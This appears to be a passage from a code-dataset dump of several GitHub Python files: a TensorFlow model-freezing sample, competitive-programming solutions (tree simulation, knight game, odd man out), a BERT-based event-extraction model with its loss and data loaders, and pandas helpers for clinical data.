total=len(intervention_group)):\n matches: Series = abs(control_group - score)\n matches_in_caliper: Series = matches[matches <= self.caliper]\n select: int = min(len(matches_in_caliper), self.n_matches)\n if select > 0:\n chosen: List[int] = random.choice(matches_in_caliper.index, select, replace=False).tolist()\n match_ids.update({index: chosen})\n control_group: Series = control_group.drop(index=chosen)\n\n matched_table: DataFrame = self.create_matches_table(match_ids)\n return matched_table.reset_index().melt()[\"value\"].to_list()\n","repo_name":"Riskified/ps-matching","sub_path":"src/find_similarities.py","file_name":"find_similarities.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"30358972036","text":"import tensorflow as tf\nimport numpy as np\n\nW=tf.Variable(initial_value=tf.random_normal([1]), name='weight',trainable=True)\nb=tf.Variable(initial_value=0.001,name='bias',trainable=True)\n\nx=tf.placeholder(dtype=tf.float32, shape=[1],name='x')\ny=tf.add(tf.multiply(W,x),b,name='output')\ninit=tf.global_variables_initializer()\nsaver=tf.train.Saver()\nsave_path=\"/home/\"\nmodel_save=save_path+\"saved_model.ckpt\"\n#TensorFlow session\nwith tf.Session() as sess:\n sess.run(init) #initialising the variables\n op=sess.run(y, feed_dict={x: np.reshape(1.5,[1])}) #sample run(optional)\n saver.save(sess,model_save) #saving the model\n tf.train.write_graph(sess.graph_def, save_path, 'saved_model.pbtxt')\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.tools import freeze_graph\n\nsave_path=\"/home/\"\nMODEL_NAME = 'Sample_model' #name of the model optional\ninput_graph_path = save_path+'saved_model.pbtxt'#complete path to the input graph\ncheckpoint_path = save_path+'saved_model.ckpt' #complete path to the model's checkpoint file\ninput_saver_def_path = \"\"\ninput_binary = False\noutput_node_names = \"output\" #output node's name. Should match to that mentioned in your code\nrestore_op_name = \"save/restore_all\"\nfilename_tensor_name = \"save/Const:0\"\noutput_frozen_graph_name = save_path+'saved_model'+'.pb' # the name of .pb file you would like to give\nclear_devices = True\n\nfreeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path, output_node_names,\n restore_op_name, filename_tensor_name,\n output_frozen_graph_name, clear_devices, \"\") \n\nsaved_model_dir = '/home'\nconverter = tf.lite.TFLiteConverter.from_saved_model(saved_model_dir)\ntflite_model = converter.convert()\nopen(\"converted_model.tflite\", \"wb\").write(tflite_model)\n","repo_name":"callyou2mind/tensorflow","sub_path":"tf_lite_sample.py","file_name":"tf_lite_sample.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13049446286","text":"\"\"\"\n백준 16235. 나무재테크\nblog : https://daimhada.tistory.com/114\nproblem : https://www.acmicpc.net/problem/16235\n\"\"\"\nimport sys\nfrom collections import defaultdict\ninput = sys.stdin.readline\n\ntree_count = 0\n\ndef solve(board, nutritions, tree_dict, k):\n \"\"\"\n :param board : field\n :param nutritions: given nutritions\n :param tree_dict: tree's data\n :param k: year\n :return: remained tree's count\n \"\"\"\n global tree_count\n year = 0\n dr = [-1, -1, -1, 0, 0, 1, 1, 1]\n dc = [-1, 0, 1, -1, 1, -1, 0, 1]\n\n while year < k:\n\n # spring, summer, winter\n for i in range(n*n):\n r = i // n\n c = i % n\n\n nutrition = board[r][c]\n add_nutrition = 0\n trees = tree_dict[(r, c)]\n\n # If there is no tree planted, it will only supply nutrients.\n if not trees:\n add_nutrition += nutritions[r][c]\n add_nutrition += nutrition\n board[r][c] = add_nutrition\n continue\n\n cnt = len(trees)\n temp_trees = []\n # spring & summer\n while 0 < cnt:\n tree = trees.pop()\n checked = nutrition - tree\n # check if nutrients remain\n if 0 <= checked:\n nutrition -= tree\n temp_trees.append(tree + 1)\n else:\n # 유효하지 않으므로, 나무 죽이기\n add_nutrition += (tree // 2)\n tree_count -= 1\n cnt -= 1\n # 성장한 나무들을 기존 배열에 추가해준다\n trees.extend(temp_trees)\n\n if 1 < len(trees):\n trees.sort(reverse= True)\n\n # winter\n add_nutrition += nutritions[r][c]\n add_nutrition += nutrition\n board[r][c] = add_nutrition\n\n # autumn\n for key, value in tree_dict.items():\n spread_tree_count = 0\n if len(value) == 0:\n continue\n\n for i in value:\n # if the oldest tree is less than 5, break\n if i < 5:\n break\n if i % 5 == 0:\n spread_tree_count += 1\n\n if spread_tree_count > 0:\n r, c = key\n for d in range(8):\n temp_r = r + dr[d]\n temp_c = c + dc[d]\n if 0 <= temp_r < n and 0 <= temp_c < n:\n # breed Tree\n tree_count += spread_tree_count\n tree_dict[(temp_r, temp_c)].extend([1]*spread_tree_count)\n # add year\n year += 1\n print(tree_count)\n return tree_count\n\nif __name__ == \"__main__\":\n n, m, k = map(int, input().split())\n nutritions = []\n board = [[5]*n for _ in range(n)]\n\n for i in range(n):\n nutritions.append(list(map(int, input().split())))\n\n # Store the trees(age) in dict, key is position\n tree_dict = defaultdict(lambda :[])\n for t in range(m):\n r, c, old = map(int, input().strip().split())\n tree_dict[(r-1,c-1)].append(old)\n tree_count += 1\n solve(board, nutritions, tree_dict, k)\n","repo_name":"histuckyi/algorithm","sub_path":"acmicpc/16235.py","file_name":"16235.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72384171280","text":"def is_valid(pos, size):\n row = pos[0]\n col = pos[1]\n return 0 <= row < size and 0 <= col < size\n\n\ndef get_killed_knights(row, col, size, board):\n killed_knights = 0\n rows = [-2, -1, 1, 2, 2, 1, -1, -2]\n cols = [1, 2, 2, 1, -1, -2, -2, -1]\n for i in range(8):\n current_pos = [row + rows[i], col + cols[i]]\n if is_valid(current_pos, size) and board[current_pos[0]][current_pos[1]] == \"K\":\n killed_knights += 1\n return killed_knights\n\n\nn = int(input())\nboard = []\ntotal_kills = 0\n\nfor _ in range(n):\n board.append([x for x in input()])\n\nwhile True:\n most_kills = 0\n to_kill = []\n\n for row in range(n):\n for col in range(n):\n if board[row][col] == \"K\":\n killed_knights = get_killed_knights(row, col, n, board)\n if killed_knights > most_kills:\n most_kills = killed_knights\n to_kill = [row, col]\n\n if most_kills == 0:\n break\n\n to_kill_row = to_kill[0]\n to_kill_col = to_kill[1]\n board[to_kill_row][to_kill_col] = \"0\"\n total_kills += 1\n\nprint(total_kills)\n\n\n#### Some other solution ####\n\n# def check_if_other_K(i, j, board): # count for each possible moves on 'L' pattern of this K how many K can reach\n# count = 0\n# if (i - 2 >= 0 and j + 1 < board_size and board[i - 2][j + 1] == 'K'):\n# count += 1\n# if (i - 2 >= 0 and j - 1 >= 0 and board[i - 2][j - 1] == 'K'):\n# count += 1\n# if (i - 1 >= 0 and j + 2 < board_size and board[i - 1][j + 2] == 'K'):\n# count += 1\n# if (i - 1 >= 0 and j - 2 >= 0 and board[i - 1][j - 2] == 'K'):\n# count += 1\n# if (i + 2 < board_size and j + 1 < board_size and board[i + 2][j + 1] == 'K'):\n# count += 1\n# if (i + 2 < board_size and j - 1 >= 0 and board[i + 2][j - 1] == 'K'):\n# count += 1\n# if (i + 1 < board_size and j + 2 < board_size and board[i + 1][j + 2] == 'K'):\n# count += 1\n# if (i + 1 < board_size and j - 2 >= 0 and board[i + 1][j - 2] == 'K'):\n# count += 1\n# return count\n#\n# board_size = int(input())\n#\n# board = [list(input()) for i in range(board_size)]\n#\n# removed = 0\n# while True:\n#\n# K_list = []\n#\n# for i in range(board_size):\n# for j in range(board_size):\n# if board[i][j] == 'K':\n# count = check_if_other_K(i, j, board)\n# if count > 0:\n# K_list.append([count, i, j]) # makes a list with count of reachable Ks and its coordinates\n#\n# if not K_list: # if list is empty, end of checking loops\n# break\n#\n# K_list = sorted(K_list, key= lambda x: -x[0]) # sort the K by the most \"dangerous\"\n#\n# i, j = K_list[0][1], K_list[0][2] # get the most \"dangerous\" K coordinates\n# board[i][j] = '0' # remove this K\n# removed += 1 # increment the number of removed K\n#\n# print(removed)","repo_name":"dechevh/Python-Advanced","sub_path":"Multidimensional-Arrays/knight_game.py","file_name":"knight_game.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26462227354","text":"# https://open.kattis.com/problems/oddmanout\n\nimport sys\n\ndef case(G):\n gs = sys.stdin.readline().split()\n gs.sort()\n\n for i in range(int(len(gs) / 2)):\n if(gs[2*i] != gs[2*i + 1]):\n return gs[2*i]\n \n return gs[len(gs) - 1]\n\nN = int(input())\nfor i in range(N):\n G = int(input())\n print(\"Case #\" + str(i + 1) + \": \" + str(case(G)))","repo_name":"yifeng-pan/competitive_programming","sub_path":"kattis/solutions/oddmanout.py","file_name":"oddmanout.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36434294071","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim import AdamW\nfrom torch.utils.data import DataLoader\nfrom transformers import BertModel\nfrom itertools import chain\nimport pickle\n\nfrom type_def import *\nfrom utils import tools, batch_tool, tokenize_tools\nfrom utils.tokenize_tools import OffsetMapping\nfrom utils.data import SimpleDataset\nfrom evaluate.evaluator import BaseEvaluator, EE_F1Evaluator, SentenceWithEvent, Events, Event, Mention, Mentions\nfrom models.model_utils import get_init_params\nfrom analysis.recorder import NaiveRecorder\n\nfrom work.EE import EE_settings, EE_utils\n\n\nclass PLMEE(nn.Module):\n def __init__(self,\n plm_lr: float = EE_settings.plm_lr,\n linear_lr: float = EE_settings.others_lr,\n plm_path: str = EE_settings.default_plm_path,\n event_types: str = EE_settings.event_types_full,\n role_types: str = EE_settings.role_types,\n threshold: float = EE_settings.event_detection_threshold):\n super(PLMEE, self).__init__()\n self.init_params = get_init_params(locals())\n\n self.plm_lr = plm_lr\n self.linear_lr = linear_lr\n self.plm_path = plm_path\n self.event_types = event_types\n self.role_types = role_types\n\n self.threshold = threshold\n\n self.bert = BertModel.from_pretrained(self.plm_path)\n self.hidden = self.bert.config.hidden_size\n self.trigger_linear_start = nn.Linear(self.hidden, len(self.event_types))\n self.trigger_linear_end = nn.Linear(self.hidden, len(self.event_types))\n self.argument_linear_start = nn.Linear(self.hidden, len(self.role_types))\n self.argument_linear_end = nn.Linear(self.hidden, len(self.role_types))\n\n self.init_weights()\n\n def init_weights(self):\n torch.nn.init.xavier_uniform_(self.trigger_linear_start.weight)\n self.trigger_linear_start.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.argument_linear_start.weight)\n self.argument_linear_start.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.trigger_linear_end.weight)\n self.trigger_linear_end.bias.data.fill_(0)\n torch.nn.init.xavier_uniform_(self.argument_linear_end.weight)\n self.argument_linear_end.bias.data.fill_(0)\n\n def get_optimizers(self):\n self.plm_params = self.bert.parameters()\n self.trigger_start_params = self.trigger_linear_start.parameters()\n self.trigger_end_params = self.trigger_linear_end.parameters()\n self.argument_start_params = self.argument_linear_start.parameters()\n self.argument_end_params = self.argument_linear_end.parameters()\n\n plm_optimizer = AdamW(params=self.plm_params, lr=self.plm_lr)\n linear_optimizer = AdamW(params=chain(self.trigger_start_params, self.trigger_end_params, self.argument_start_params, self.argument_end_params), lr=self.linear_lr)\n return [plm_optimizer, linear_optimizer]\n\n def forward(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor, trigger_gt: list = None):\n \"\"\"\n\n :param input_ids: (bsz, seq_l)\n :param token_type_ids: (bsz, seq_l)\n :param attention_mask: (bsz, seq_l)\n :param trigger_gt:\n len(trigger_gt) == bsz\n len(trigger_gt[*]) == 2, start and end\n 如果为None,则根据trigger_output提取trigger信息。如果不为None,则使用该list中的下标信息对token_type_ids进行标记\n :return:\n \"\"\"\n bsz, seq_l = input_ids.shape\n trigger_output = self.predict_trigger(input_ids, token_type_ids, attention_mask) # dict\n trigger_start, trigger_end = trigger_output['trigger_start'], trigger_output['trigger_end']\n # both (bsz, seq_l, event_type_cnt)\n if trigger_gt is None:\n # 这种情况下,无反向传播\n trigger_start = trigger_start.permute([0, 2, 1])\n trigger_end = trigger_end.permute([0, 2, 1])\n # both (bsz, event_type_cnt, seq_l)\n\n trigger_start_digit = (trigger_start > self.threshold).int().tolist()\n trigger_end_digit = (trigger_end > self.threshold).int().tolist()\n # both (bsz, event_type_cnt, seq_l)\n predicts = [] # (batch, event_type, [trigger_span, arguments])\n\n for i_batch, (e_start_tensor, e_start_digit, e_end_tensor, e_end_digit) in enumerate(list(zip(trigger_start, trigger_start_digit, trigger_end, trigger_end_digit))):\n # 对每个batch考虑\n # all (event_type_cnt, seq_l)\n predicts.append([])\n # predicts[-1]存放当前句子的信息\n cur_input_ids = input_ids[i_batch].unsqueeze(0) # (seq_l)\n cur_attention_mask = input_ids[i_batch].unsqueeze(0) # (seq_l)\n for i_etype, (e_start_type_tensor, e_start_type_digit, e_end_type_tensor, e_end_type_digit) in enumerate(list(zip(e_start_tensor, e_start_digit, e_end_tensor, e_end_digit))):\n # 对当前句子的每个事件类型考虑\n # all (seq_l)\n predicts[-1].append([])\n # predicts[-1][-1]存放当前事件类型的信息\n # 该句子当前类型的触发词都存放在span当中\n spans = tools.argument_span_determination(e_start_type_digit, e_end_type_digit, e_start_type_tensor, e_end_type_tensor)\n # 存放该句子在每个触发词下所对应的论元的列表\n argument_preds: List[Tuple[int, List[Tuple[int, int]]]] = [] # list element: (role_type, role span list)\n # len(spans) == len(argument_preds)\n for e_span in spans:\n # argument_preds[-1]就存放论元的列表\n cur_token_type_ids = token_type_ids[i_batch].clone().detach().unsqueeze(0) # (1, seq_l)\n cur_token_type_ids[0][e_span[0]] = 1\n cur_token_type_ids[0][e_span[1]] = 1\n argument_output = self.predict_argument(cur_input_ids, cur_token_type_ids, cur_attention_mask)\n a_start, a_end = argument_output['argument_start'].squeeze(0).T, argument_output['argument_end'].squeeze(0).T\n # both (role_type_cnt, seq_l)\n for i_rtype, (e_start, e_end) in enumerate(list(zip(a_start, a_end))):\n # both (seq_l)\n a_start_digit = (e_start > self.threshold).int().tolist()\n a_end_digit = (e_end > self.threshold).int().tolist()\n cur_span = tools.argument_span_determination(a_start_digit, a_end_digit, a_start, a_end)\n if len(cur_span) != 0:\n argument_preds.append((i_rtype, cur_span))\n if len(argument_preds) != 0:\n predicts[-1][-1].append([e_span, argument_preds])\n\n # predicts[-1][-1].append(spans)\n # predicts[-1][-1].append(argument_preds)\n # predicts[-1][-1].append((spans, argument_preds))\n return {\n 'predicts': predicts\n }\n else:\n token_label = torch.zeros(token_type_ids.shape, dtype=torch.long)\n if token_type_ids.is_cuda:\n token_label = token_label.cuda()\n for idx, elem in enumerate(trigger_gt):\n token_label[idx][elem[0]] = 1\n token_label[idx][elem[1]] = 1\n token_type_ids = token_type_ids + token_label\n argument_output = self.predict_argument(input_ids, token_type_ids, attention_mask)\n a_start, a_end = argument_output['argument_start'], argument_output['argument_end']\n # both (bsz, seq_l, role_type_cnt)\n return {\n 'trigger_start_pred': trigger_start,\n 'trigger_end_pred': trigger_end,\n 'argument_start_pred': a_start,\n 'argument_end_pred': a_end,\n 'attention_mask': attention_mask\n }\n\n def predict_trigger(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor):\n output = self.bert(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n result = output[0] # (bsz, seq_l, hidden)\n\n trigger_start = torch.sigmoid(self.trigger_linear_start(result)) # (bsz, seq_l, event_type_cnt)\n trigger_end = torch.sigmoid(self.trigger_linear_end(result)) # (bsz, seq_l, event_type_cnt)\n return {\n 'trigger_start': trigger_start,\n 'trigger_end': trigger_end\n }\n\n def predict_argument(self, input_ids: torch.Tensor, token_type_ids: torch.Tensor, attention_mask: torch.Tensor):\n output = self.bert(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n result = output[0] # (bsz, seq_l, hidden)\n\n argument_start = torch.sigmoid(self.argument_linear_start(result)) # (bsz, seq_l, event_type_cnt)\n argument_end = torch.sigmoid(self.argument_linear_end(result)) # (bsz, seq_l, event_type_cnt)\n return {\n 'argument_start': argument_start,\n 'argument_end': argument_end\n }\n\n\nclass PLMEE_Loss(nn.Module):\n def forward(self,\n trigger_start_pred: torch.Tensor,\n trigger_end_pred: torch.Tensor,\n argument_start_pred: torch.Tensor,\n argument_end_pred: torch.Tensor,\n attention_mask: torch.Tensor,\n trigger_start_label: torch.Tensor,\n trigger_end_label: torch.Tensor,\n argument_start_label: torch.Tensor,\n argument_end_label: torch.Tensor):\n \"\"\"\n\n :param trigger_start_pred: (bsz, seq_l, event_type_cnt)\n :param trigger_end_pred:\n :param argument_start_pred:\n :param argument_end_pred:\n :param attention_mask: (bsz, seq_l)\n :param trigger_start_label:\n :param trigger_end_label:\n :param argument_start_label:\n :param argument_end_label:\n :return:\n \"\"\"\n # mask = (1 - attention_mask).bool()\n #\n # # 计算mask\n # trigger_start_pred = trigger_start_pred.masked_fill(mask, value=torch.tensor(0))\n # trigger_end_pred = trigger_end_pred.masked_fill(mask, value=torch.tensor(0))\n # argument_start_pred = argument_start_pred.masked_fill(mask, value=torch.tensor(0))\n # argument_end_pred = argument_end_pred.masked_fill(mask, value=torch.tensor(0))\n\n attention_mask = attention_mask.unsqueeze(-1) # (bsz, seq_l, 1)\n # 计算loss\n trigger_start_loss = F.binary_cross_entropy(trigger_start_pred, trigger_start_label, reduction='none')\n trigger_end_loss = F.binary_cross_entropy(trigger_end_pred, trigger_end_label, reduction='none')\n argument_start_loss = F.binary_cross_entropy(argument_start_pred, argument_start_label, reduction='none')\n argument_end_loss = F.binary_cross_entropy(argument_end_pred, argument_end_label, reduction='none')\n\n ts_loss = torch.sum(trigger_start_loss * attention_mask) / torch.sum(attention_mask)\n te_loss = torch.sum(trigger_end_loss * attention_mask) / torch.sum(attention_mask)\n as_loss = torch.sum(argument_start_loss * attention_mask) / torch.sum(attention_mask)\n ae_loss = torch.sum(argument_end_loss * attention_mask) / torch.sum(attention_mask)\n\n trigger_loss = ts_loss + te_loss\n argument_loss = as_loss + ae_loss\n\n loss = trigger_loss + argument_loss\n\n return loss\n\n\ndef convert_predicts_to_SentenceWithEvent(predicts: list, sentence: str, offset_mapping: OffsetMapping, event_types: list = EE_settings.event_types_full, role_types: list = EE_settings.role_types):\n \"\"\"\n\n :param predicts: (batch, event_type, [trigger_span, arguments])\n 其中trigger span长度为2\n arguments为(trigger_span role_type)\n 在eval的条件下,默认batch_size=1\n :return:\n \"\"\"\n if len(predicts) != 1:\n raise Exception('[convert_predicts_to_SentenceWithEvent]batch_size不为1!')\n predict = predicts[0]\n events = []\n for i_etype, e_etype in enumerate(predict):\n event_type_word = event_types[i_etype]\n mentions = []\n for i_ta, e_ta in enumerate(e_etype):\n trigger_span, arguments = e_ta\n trigger_word = tokenize_tools.tokenSpan_to_word(sentence, trigger_span, offset_mapping)\n trigger_char_span = list(tokenize_tools.tokenSpan_to_charSpan(trigger_span, offset_mapping))\n for elem_arg in arguments:\n rtype_idx, arg_spans = elem_arg\n role_type_word = role_types[rtype_idx]\n for elem_role_span in arg_spans:\n role_word = tokenize_tools.tokenSpan_to_word(sentence, elem_role_span, offset_mapping)\n role_charspan = tokenize_tools.tokenSpan_to_charSpan(elem_role_span, offset_mapping)\n mentions.append({\n 'word': role_word,\n 'span': role_charspan,\n 'role': role_type_word\n })\n mentions.append({\n 'word': trigger_word,\n 'span': trigger_char_span,\n 'role': 'trigger'\n })\n\n events.append({\n 'type': event_type_word,\n 'mentions': mentions\n })\n\n sentencenwithevents = {\n 'id': '',\n 'content': sentence,\n 'events': events\n }\n return sentencenwithevents\n\n\nclass PLMEE_Evaluator(BaseEvaluator):\n def __init__(self, event_types: list = EE_settings.event_types_full, role_types: list = EE_settings.role_types):\n super(PLMEE_Evaluator, self).__init__()\n self.event_types = event_types\n self.role_types = role_types\n self.f1evaluator = EE_F1Evaluator()\n self.pred_lst, self.gt_lst = [], []\n\n def eval_single(self, predicts: list, gt: SentenceWithEvent, sentence, offset_mapping):\n preds = convert_predicts_to_SentenceWithEvent(predicts, sentence, offset_mapping, self.event_types, self.role_types)\n self.f1evaluator.eval_single(gt, preds)\n self.pred_lst.append({\n 'preds': predicts,\n 'sentence': sentence\n })\n self.gt_lst.append(gt)\n\n\n def eval_step(self) -> Dict[str, Any]:\n result = self.f1evaluator.eval_step()\n self.pred_lst = []\n self.gt_lst = []\n return result\n\n\ndef train_dataset_factory(data_dicts: List[dict], bsz: int = EE_settings.default_bsz, shuffle: bool = EE_settings.default_shuffle, dataset_type: str = 'FewFC'):\n if dataset_type == 'FewFC':\n event_types = EE_settings.event_types_full\n role_types = EE_settings.role_types\n else:\n raise Exception(f'{dataset_type}数据集不存在!')\n train_dataset = SimpleDataset(data_dicts)\n\n\n def collate_fn(lst):\n \"\"\"\n data_dict包含\n - content\n - input_ids\n - token_type_ids\n - attention_mask\n - trigger_gt\n - trigger_start_label\n - trigger_end_label\n - argument_start_label\n - argument_end_label\n - offset_mapping\n\n 模型需要输入:\n :param lst:\n :return:\n \"\"\"\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n seq_l = input_ids.shape[1]\n # all (bsz, max_seq_l)\n\n # generate trigger gt\n trigger_gt = data_dict['trigger_gt']\n\n # generate trigger labels\n trigger_start_label_info, trigger_end_label_info = data_dict['trigger_start_label'], data_dict['trigger_end_label']\n trigger_start_label, trigger_end_label = torch.zeros((bsz, seq_l, len(event_types)), dtype=torch.float), torch.zeros((bsz, seq_l, len(event_types)), dtype=torch.float)\n for idx, e_trigger_label in enumerate(trigger_start_label_info):\n for i_etype, i_start in enumerate(e_trigger_label):\n i_cur_type, i_cur_index = i_start\n trigger_start_label[idx][i_cur_index][i_cur_type] = 1\n for idx, e_trigger_label in enumerate(trigger_end_label_info):\n for i_etype, i_end in enumerate(e_trigger_label):\n i_cur_type, i_cur_index = i_end\n trigger_end_label[idx][i_cur_index][i_cur_type] = 1\n\n # generate argument labels\n arg_start_info, arg_end_info = data_dict['argument_start_label'], data_dict['argument_end_label']\n argument_start_label, argument_end_label = torch.zeros((bsz, seq_l, len(role_types)), dtype=torch.float), torch.zeros((bsz, seq_l, len(role_types)), dtype=torch.float)\n for idx, e_arg_label in enumerate(arg_start_info):\n for i_rtype, i_start in enumerate(e_arg_label):\n i_cur_type, i_cur_index = i_start\n argument_start_label[idx][i_cur_index][i_cur_type] = 1\n for idx, e_arg_label in enumerate(arg_end_info):\n for i_rtype, i_end in enumerate(e_arg_label):\n i_cur_type, i_cur_index = i_end\n argument_end_label[idx][i_cur_index][i_cur_type] = 1\n\n return {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask,\n 'trigger_gt': trigger_gt\n }, {\n 'trigger_start_label': trigger_start_label,\n 'trigger_end_label': trigger_end_label,\n 'argument_start_label': argument_start_label,\n 'argument_end_label': argument_end_label\n }\n\n train_dataloader = DataLoader(train_dataset, batch_size=bsz, shuffle=shuffle, collate_fn=collate_fn)\n\n return train_dataloader\n\n\ndef dev_dataset_factory(data_dicts: List[dict], dataset_type: str, valid_type: str = 'total'):\n \"\"\"\n\n :param data_dicts:\n :param dataset_type:\n :param valid_type: trigger, argument, total\n :return:\n \"\"\"\n valid_dataset = SimpleDataset(data_dicts)\n\n def trigger_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n def arg_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n def total_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n content = data_dict['content'][0]\n events = data_dict['events'][0]\n offset_mapping = data_dict['offset_mapping'][0]\n sentence_with_event = {\n 'content': content,\n 'events': events,\n 'id': ''\n }\n return {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask\n }, {\n 'gt': sentence_with_event,\n 'sentence': content,\n 'offset_mapping': offset_mapping\n }\n\n if valid_type == 'trigger':\n collate_fn = trigger_collate_fn\n elif valid_type == 'argument':\n collate_fn = arg_collate_fn\n elif valid_type == 'total':\n collate_fn = total_collate_fn\n else:\n raise Exception(f'{valid_type}为错误的评价方法')\n\n valid_dataloader = DataLoader(valid_dataset, batch_size=1, shuffle=False, collate_fn=collate_fn)\n return valid_dataloader\n\n\ndef dataset_factory(train_file: str, valid_file: str, bsz: int = EE_settings.default_bsz, shuffle: bool = EE_settings.default_shuffle, dataset_type: str = 'FewFC'):\n train_data_dicts = pickle.load(open(train_file, 'rb'))\n valid_data_dicts = pickle.load(open(valid_file, 'rb'))\n\n train_dataloader = train_dataset_factory(train_data_dicts, bsz=bsz, shuffle=shuffle, dataset_type=dataset_type)\n valid_dataloader = dev_dataset_factory(valid_data_dicts, dataset_type=dataset_type)\n\n return train_dataloader, valid_dataloader\n\n\n\nmodel_registry = {\n 'model': PLMEE,\n 'loss': PLMEE_Loss,\n 'evaluator': PLMEE_Evaluator,\n 'train_val_data': dataset_factory,\n 'recorder': NaiveRecorder\n}\n\n\nif __name__ == '__main__':\n train_file = 'temp_data/train.FewFC.labeled.pk'\n valid_file = 'temp_data/valid.FewFC.gt.pk'\n bsz = 4\n shuffle = False\n dataset_type = 'FewFC'\n\n train_data_dicts = pickle.load(open(train_file, 'rb'))\n valid_data_dicts = pickle.load(open(valid_file, 'rb'))\n\n train_dataloader = train_dataset_factory(train_data_dicts, bsz=bsz, shuffle=shuffle, dataset_type=dataset_type)\n valid_dataloader = dev_dataset_factory(valid_data_dicts, dataset_type=dataset_type)\n\n limit = 5\n train_data, valid_data = [], []\n for idx, (train_sample, valid_sample) in enumerate(list(zip(train_dataloader, valid_dataloader))):\n train_data.append(train_sample)\n valid_data.append(valid_sample)\n\n","repo_name":"1170500820/DLtools","sub_path":"work/EE/PLMEE_rebuild/plmee.py","file_name":"plmee.py","file_ext":"py","file_size_in_byte":22528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"35507489469","text":"def refining_expGrp(base,keep,rename,dropna_col,index_col=None):\n XpG = pd.read_csv(base+r'/'+base+'_exp_grp.csv',index_col=index_col)\n XpG = XpG[keep]\n XpG = XpG.rename(index=str,columns=rename)\n XpG = XpG.dropna(axis=0,subset=dropna_col)\n return XpG\n\ndef refining_trscr(base,transpose=False):\n Trscr = pd.read_csv(base+r'/'+base+'_data.csv',index_col=0)\n if transpose:\n Trscr = Trscr.transpose()\n return Trscr\n\ndef refining_platform(base,keep,rename,dtype):\n Plt = pd.read_csv(base+r'/'+base+'_platform.csv',dtype=dtype)\n Plt = Plt[Plt['SPOT_ID']!='--Control']\n Plt = Plt[keep]\n Plt = Plt.rename(index=str,columns=rename)\n return Plt\n\ndef barsplot(df,titre='',figsize=(6,4)):\n \n valeurs = df.unique()\n \n categories_sain = []\n categories_malade = []\n \n for v in valeurs:\n \n if pd.isnull(v):\n categories_sain.append(Clinique['id_pathology'].loc[Index_sain].apply(pd.isnull).sum())\n categories_malade.append(Clinique['id_pathology'].loc[Index_malade].apply(pd.isnull).sum())\n else:\n categories_malade.append((df.loc[Index_malade].values == v).sum())\n categories_sain.append((df.loc[Index_sain].values == v).sum())\n\n index = np.arange(valeurs.shape[0])\n \n fig=plt.figure(figsize=figsize)\n \n p1 = plt.bar(index,categories_malade)\n p2 = plt.bar(index,categories_sain,bottom=categories_malade)\n\n plt.ylabel('N')\n plt.title(titre)\n plt.xticks(index,valeurs)\n plt.legend((p2[0],p1[0]),('Sain','Malade'))\n plt.show()\n\ndef OHEncoding(filename,categorical_columns):\n DF = pd.read_csv(filename,index_col=ID)\n DF = pd.get_dummies(DF,columns=categorical_columns)\n return DF\n\ndef Create_Patient_Index_Regression(df):\n return df[DEAD].index.values\n\ndef Create_Patient_Drop_Index_Classification(df,n_mois):\n I = [(k[-1]=='+' and int(k[:-1]) n_mois))\n\ndef Y_clinique(base,index,n_mois=None):\n Y = pd.read_csv(base+r'/'+base+'_clinique_OH.csv',index_col=0)\n Y = Y.loc[index]\n if n_mois is None:\n Y = Y['os_months']\n else:\n Y = Y[OS].apply(get_function_survival(n_mois))\n return 